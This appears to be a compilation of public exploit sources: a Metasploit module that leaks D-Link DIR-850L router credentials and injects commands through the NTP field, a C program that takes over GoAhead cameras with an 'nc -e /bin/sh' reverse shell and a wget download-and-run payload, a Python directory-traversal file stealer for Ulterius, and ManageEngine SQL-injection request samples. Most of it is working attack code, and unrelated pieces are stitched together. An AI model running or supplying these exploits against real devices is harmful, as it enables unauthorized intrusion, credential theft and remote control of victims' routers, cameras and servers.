include Msf::Auxiliary::Report
include Msf::Exploit::CmdStager
# Registers module metadata: MIPS big-endian Linux target, reverse TCP shell as the
# default payload, a single 'Automatic' target.
def initialize(info = {})
super(update_info(info,
'Name' => 'DIR-850L (Un)authenticated OS Command Exec',
'Description' => %q{
This module leverages an unauthenticated credential disclosure
vulnerability to then execute arbitrary commands on DIR-850L routers
as an authenticated user. Unable to use Meterpreter payloads.
},
'Author' => [
'Mumbai', # https://github.com/realoriginal (module)
'Zdenda' # vuln discovery
],
'References' => [
['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
],
'DisclosureDate' => 'Aug 9 2017',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
end
# Banner-only check: fetches '/' and inspects the Server response header.
# Returns Detected when the header names DIR-850L, Safe when it additionally contains
# WEBACCESS/1.0, and Unknown otherwise (including on connection errors).
# No vulnerable endpoint is touched here, so Detected means "model matched", nothing more.
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers['Server']
auth = res.headers['Server']
if auth =~ /DIR-850L/
if auth =~ /WEBACCESS\/1\.0/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
# Records a username/password pair and its service in the framework database.
# opts keys read here: :ip, :port, :service_name, :user, :password, :proof.
# NOTE(review): nothing in this class calls report_cred as shown.
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
# some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
# should write an auxiliary module to-do -> WRITE AUXILIARY
#
# Credential disclosure step. Posts an XML document to /hedwig.cgi whose <service>
# value is a relative path (../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml) and reads
# <name>/<password> from the response. The only cookie sent is a random 8-letter uid,
# i.e. no authenticated session is involved.
# Returns [username, password]; calls fail_with when no <password> element comes back.
# The recovered password is printed (verbose) and the full response is stored as loot,
# so operator logs and the loot directory hold cleartext device credentials afterwards.
def retrieve_creds
begin
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
xml << "<postxml>\r\n"
xml << "<module>\r\n"
xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
xml << "</module>\r\n"
xml << "</postxml>"
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'encode_params' => false,
'headers' => {
'Accept-Encoding' => 'gzip, deflate',
'Accept' => '*/*'
},
'ctype' => 'text/xml',
'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
'data' => xml,
})
# NOTE(review): unlike check, res is not tested for nil before res.body is read.
if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
parse = res.get_xml_document
username = parse.at('//name').text
password = parse.at('//password').text
vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
print_good("#{peer} - Downloaded credentials to #{loot}")
return username, password
else
fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
# Fetches a session uid and login challenge: GET /authentication.cgi, parsed as JSON.
# Returns [uid, challenge].
# NOTE(review): res is not tested for nil before get_json_document is called.
def retrieve_uid
begin
res = send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'GET',
})
parse = res.get_json_document
uid = parse['uid']
challenge = parse['challenge']
return uid, challenge
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
# Challenge/response login. The response value is the upper-cased hex HMAC-MD5 keyed with
# the password over (username + challenge), posted to /authentication.cgi with the uid cookie.
# Returns the uid. The POST response is not inspected, so the uid is returned whether or
# not the device accepted the login.
def login(username, password)
uid, challenge = retrieve_uid
begin
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'POST',
'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}"
})
return uid
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
# Command stager callback: runs one command per call, logging in again each time.
# The command is interpolated into the <server> element of a DEVICE.TIME configuration
# document after a ';', so the device's handling of the NTP server name is the injection
# point. Two requests follow: the document is saved through /hedwig.cgi, then applied with
# ACTIONS=SETCFG,ACTIVATE through /pigwidgeon.cgi.
# Side effect visible on the device afterwards: the time/NTP settings are overwritten
# (NTP enabled, period 604800, timezone 20, and a <server> value containing ';').
# Returns the response to the /pigwidgeon.cgi request.
def execute_command(cmd, opts)
uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
payload << "<postxml>\r\n"
payload << "<module>\r\n"
payload << " <service>DEVICE.TIME</service>\r\n"
payload << " <device>\r\n"
payload << " <time>\r\n"
payload << " <ntp>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
payload << " </ntp>\r\n"
payload << " <ntp6>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " </ntp6>\r\n"
payload << " <timezone>20</timezone>\r\n"
payload << " <time/>\r\n"
payload << " <date/>\r\n"
payload << " <dst>0</dst>\r\n"
payload << " <dstmanual/>\r\n"
payload << " <dstoffset/>\r\n"
payload << " </time>\r\n"
payload << " </device>\r\n"
payload << "</module>\r\n"
payload << "</postxml>"
begin
# save configuration
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'ctype' => 'text/xml',
'data' => payload,
'cookie' => "uid=#{uid}"
})
# execute configuration
res = send_request_cgi({
'uri' => '/pigwidgeon.cgi',
'method' => 'POST',
'data' => 'ACTIONS=SETCFG,ACTIVATE',
'cookie' => "uid=#{uid}"
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
# Entry point: requires check to return Detected (banner match only), recovers the
# credentials, then hands off to the wget-flavoured command stager, which calls
# execute_command for each staged line (at most 200 characters per line).
def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
end
#
# Information Retrieval, obtains creds and logs in
#
@username, @password = retrieve_creds
execute_cmdstager(
:flavor => :wget,
:linemax => 200
)
end
end
// Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c
// Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define CAM_PORT 80
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
char * creds(char *argv,
int get_config);
int rce(char *argv,
char *id,
char attack[],
char desc[]);
/*
 * Entry point. argv[1] is the camera address; an optional "--get-config" as argv[2]
 * makes creds() print the downloaded configuration and exit.
 *
 * Sequence as coded: creds() recovers the login/password, then rce() is called four
 * times: PAYLOAD_0 ("planting", set_ftp.cgi with a $(...) value in pwd), PAYLOAD_1
 * ("executing", ftptest.cgi), PAYLOAD_2 ("cleaning", set_ftp.cgi with a harmless pwd)
 * and PAYLOAD_1 again. A set_ftp.cgi request whose pwd parameter contains "$(" followed
 * by ftptest.cgi is therefore the request pattern this program leaves in HTTP logs.
 *
 * Returns 1 on usage error or when creds() fails, 0 otherwise. The results of the rce()
 * calls only control whether "done" is printed.
 */
int main(int argc,
char **argv,
char **envp)
{
char *id;
printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
if (argc < 2)
{
printf("%s target\n", argv[0]);
printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
return (1);
}
if (argc == 2)
printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
if (argc == 3 && !strcmp(argv[2], "--get-config"))
id = creds(argv[1], 1);
else
id = creds(argv[1], 0);
if (id == NULL)
{
printf("exploit failed\n");
return (1);
}
printf("done\n");
/* id is the 64-byte buffer from creds(): login at offset 0, password at offset 32. */
printf(" login = %s\n", id);
printf(" pass = %s\n", id + 32);
if (!rce(argv[1], id, PAYLOAD_0, "planting"))
printf("done\n");
sleep(1);
if (!rce(argv[1], id, PAYLOAD_1, "executing"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
printf("done\n");
/* NOTE(review): id is never freed; printed unconditionally, even if an rce() call failed. */
printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
return (0);
}
/*
 * Downloads the camera's system.ini and extracts the login and password from it.
 *
 * argv       - camera IPv4 address as a string (parsed with inet_pton)
 * get_config - when non-zero, print the downloaded bytes and exit(0) instead of parsing
 *
 * The request is "GET /system.ini?loginuse&loginpas" with both credential parameters
 * empty; the program's own progress message calls this "bypassing auth". That request
 * line is the indicator to search for in front-end or proxy logs.
 *
 * Returns a calloc'ed 64-byte buffer (login at offset 0, password at offset 32) that the
 * caller owns, or NULL on any failure or when the marker bytes are not found.
 */
char * creds(char *argv,
int get_config)
{
int sock;
int n;
struct sockaddr_in serv_addr;
char buf[8192] = { 0 };
char *out;
char *tmp;
char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
int old_n;
int n_total;
sock = 0;
n = 0;
old_n = 0;
n_total = 0;
printf("[+] bypassing auth ... ");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (NULL);
}
/* NOTE(review): fills the struct with the character '0' (0x30), not with zero bytes. */
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
/* NOTE(review): the error returns below leave sock open. */
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (NULL);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("creds: connect failed\n");
return (NULL);
}
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("creds: send failed\n");
return (NULL);
}
/* tmp: 10 KiB scratch copy of the response (malloc, so not zero-initialised).
   out: 64-byte zeroed result buffer. */
if (!(tmp = malloc(10 * 1024 * sizeof(char))))
return (NULL);
/* NOTE(review): tmp is leaked if this allocation fails. */
if (!(out = calloc(64, sizeof(char))))
return (NULL);
/* Read until the peer closes. Each chunk is copied to offset old_n, and old_n is set to
   the size of the chunk just read (not a running total), so from the third chunk on the
   data would overwrite earlier bytes. Copying stops once n_total reaches 10 KiB. */
while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
{
n_total += n;
if (n_total < 1024 * 10)
memcpy(tmp + old_n, buf, n);
if (n >= 0)
old_n = n;
}
close(sock);
/*
[ HTTP HEADERS ]
...
000????: 0000 0a0a 0a0a 01.. .... .... .... ....
^^^^ ^^^^ ^^
Useful reference in the binary data
in order to to find the positions of
credentials
...
...
0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
...
NOTE: reference can be too:
000????: 0006 0606 0606 0100 000a .... .... ....
Other method: parse everything, find the "admin" string and extract the associated password
by adding 31bytes after the address of 'a'[dmin].
Works if the login is admin (seems to be this by default, but can be changed by the user)
*/
if (get_config)
{
/* Dump at most 10 KiB of what was received, then terminate the process here. */
for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
printf("%c", tmp[j]);
exit (0);
}
/* Scan for the marker 0a 0a 0a 0a 01; the login is read 138 bytes and the password
   170 bytes after the marker's last byte.
   NOTE(review): the scan always covers the full 10 KiB, including bytes past n_total
   that were never written. */
for (unsigned int j = 50; j < 10 * 1024; j++)
{
if (tmp[j - 4] == 0x0a &&
tmp[j - 3] == 0x0a &&
tmp[j - 2] == 0x0a &&
tmp[j - 1] == 0x0a &&
tmp[j] == 0x01)
{
if (j + 170 < 10 * 1024)
{
/* NOTE(review): strcat copies up to the next NUL byte with no length limit; a field
   longer than 31 bytes would run past its 32-byte slot in the 64-byte out buffer. */
strcat(out, &tmp[j + 138]);
strcat(out + 32 * sizeof(char), &tmp[j + 170]);
free(tmp);
return (out);
}
}
}
/* Marker not found. NOTE(review): out is not freed on this path. */
free(tmp);
return (NULL);
}
/*
 * Sends one HTTP request built from a format string and the recovered credentials.
 *
 * argv   - camera IPv4 address as a string
 * id     - buffer from creds(): login at id, password at id + 32
 * attack - printf-style request template with two %s slots (one of the PAYLOAD_* macros)
 * desc   - label printed in the progress message
 *
 * Returns 0 when the request was sent, 1 on any failure. The response is never read.
 */
int rce(char *argv,
char *id,
char attack[],
char desc[])
{
int sock;
struct sockaddr_in serv_addr;
char *payload;
if (!(payload = calloc(512, sizeof(char))))
return (1);
sock = 0;
printf("[+] %s payload ... ", desc);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (1);
}
/* NOTE(review): fills the struct with the character '0' (0x30), not with zero bytes. */
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (1);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("rce: connect failed\n");
return (1);
}
/* NOTE(review): unbounded sprintf into a 512-byte buffer; the length depends on the
   template plus the two credential strings taken from the device's response. */
sprintf(payload, attack, id, id + 32);
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("rce: send failed\n");
return (1);
}
/* NOTE(review): sock is never closed and payload is never freed, on any path. */
return (0);
}
# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access
# Date: 11/13/2017
# Exploit Author: Rick Osgood
# Vendor Homepage: https://ulterius.io/
# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d
# Version: < 1.9.5.0
# Tested on: Windows Server 2012 R2
# CVE : CVE-2017-16806
#
# You can download almost any file that resides on the same drive letter as Ulterius server.
# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini
#
# Unfortunately, you need to know the path to the file you want to download.
# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:
# http://ulteriusURL:2206/.../fileIndex.db
#
# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to
# make it human readable. Then you can use the same script to download any juicy files you find.
#
# Ulterius writes the following to the fileIndex.db file:
# First four bytes are a timestamp so we can ignore this
# The next four items repeat until the end of the file:
# filename.length (4 bytes?)
# filename
# directory.length (4 bytes?)
# directory
import requests
import sys
import argparse
import zlib
import struct
# This function grabs the filename or file path from the fileIndex
def processChunk(i, data):
# Reads one length-prefixed string from `data` starting at offset `i` and returns
# (offset just past the string, the string). Python 2 code: data[i] is a 1-character str.
# NOTE(review): the four prefix bytes are added together rather than combined into one
# multi-byte integer, so the result equals the length only while at most one of them is
# non-zero. The header comment marks the field width as uncertain ("4 bytes?").
length = struct.unpack('B', data[i])[0]
length += struct.unpack('B', data[i+1])[0]
length += struct.unpack('B', data[i+2])[0]
length += struct.unpack('B', data[i+3])[0]
i += 4
filename = data[i:i+length]
i += length
return i, filename
# Main function
def main():
    """Command-line entry point: fetch a single file or the file index.

    Positional ``url`` is the server base URL (only the first value is
    used). Two optional modes, each run if its flag is present:

    * ``--retrieve FILEPATH``: the first FILEPATH is turned into a request
      path (drive prefix dropped, backslashes turned into forward slashes),
      appended to the base URL behind a fixed ``/.../`` prefix, fetched
      with a GET, and the response body is written to a local file named
      after FILEPATH with backslashes replaced by underscores.
    * ``--index``: ``<url>/.../fileIndex.db`` is fetched, inflated as a raw
      deflate stream, and rewritten as one ``directory\\filename`` line per
      entry into a local ``fileIndex.db``.

    Both request shapes carry literal ``/.../`` path segments in the URL,
    which is the pattern visible in the target's request logs; the file
    header lists versions before 1.9.5.0 as affected.

    No HTTP status check is made and output files are not closed
    explicitly.
    """
    # Command-line interface
    cli = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')
    cli.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')
    cli.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')
    cli.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')
    opts = cli.parse_args()

    # Mode 1: fetch one named file
    if opts.retrieve:
        requested = str(opts.retrieve[0])

        # Fixed prefix; per the original author it matches the default
        # install directory.
        prefix = "/.../.../.../.../.../.../.../.../.../"

        # Local output name: the requested path with backslashes flattened
        out_name = requested.replace('\\', '_')

        # Drop a leading drive prefix such as "c:\", then switch to
        # forward slashes for the URL.
        remote = requested[3:] if ":\\" in requested[:3] else requested
        remote = remote.replace('\\', '/')

        url = str(opts.url[0]) + prefix + remote
        print "Retrieving " + url

        # .content reads the whole body regardless of stream=True
        reply = requests.get(url=url, stream=True)

        # NOTE(review): text mode, handle never closed explicitly
        out = open(out_name, 'w')
        out.write(reply.content)

    # Mode 2: fetch and decode the file index
    if opts.index:
        url = opts.url[0] + "/.../fileIndex.db"
        print "Downloading " + url

        reply = requests.get(url=url, stream=True)

        # wbits=-15: raw deflate stream, no zlib/gzip header
        inflated = zlib.decompress(reply.content, -15)

        out = open('fileIndex.db', 'w')

        # Eight header bytes are discarded here; the file header comment
        # describes only a four-byte timestamp. NOTE(review): confirm what
        # the remaining four bytes are.
        entries = inflated[8:]

        # Each record: filename field, directory field, then 8 bytes that
        # the original author identifies as FFFFFFFFFFFFFFFF.
        pos = 0
        while pos < len(entries):
            pos, name = processChunk(pos, entries)
            pos, folder = processChunk(pos, entries)
            pos += 8
            out.write(folder + '\\' + name + '\n')
# Run main() only when this file is executed as a script, not on import.
if __name__ == '__main__':
    main()
ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities.
Proof of Concept 1 (name= parameter is susceptible):
POST /manageApplications.do?method=insert HTTP/1.1
Host: 192.168.1.190:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Referer: http://192.168.1.190:9090/admin/createapplication.do?method=createapp&grouptype=1
Cookie: testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJESNNXc4I4Ts1omY%2FiCOo47Ch6sZEoC7bRr4SfuGTOVfjv2JZAH6cun8; liveapm-_zldt=cfa03604-1dc4-4155-86f7-803952114141; diagnosticsAlarmTable_sortdir=down; JSESSIONID_APM_9090=A16B99B2C0C09EB6060B4372660CFBC3
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=66ef9ed22c8b3a67da50e905f7735abd&addmonitors=0&name=My+App2&description=Description....This+service+is+critical+to+our+business&grouptype=1&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=
Proof of Concept 2 (crafted viewProps yCanvas field):
POST /GraphicalView.do? HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/GraphicalView.do?&method=createBusinessService
Content-Length: 457
Cookie: JSESSIONID_APM_9090=53E8EBC71177607C3A7FE03EB238887E
Connection: close
&method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"showLabel":true,"showOnlyMGs":false,"showOnlyTopMGs":false,"showOnlyCritical":false,"showOnlyMGStatus":false,"backgroundColorVal":"#FFFFFF","lineColorVal":"#888c8f","textColorVal":"#444444","lineThickness":"2.5","lineTransparency":1,"xCanvas":-23.089912210349002,"yCanvas":0},"coordinates":"{\"totalNumberOfNodes\":0,\"nodeIdList\":[]}"}&haid=10000106&nodeIdVsResourceId={"node_1":"10000106"}
Proof of Concept 3:
POST /GraphicalView.do HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/showapplication.do?haid=10000106&method=showApplication&selectM=flashview&viewid=1
Content-Length: 101
Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability
Connection: close
method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0)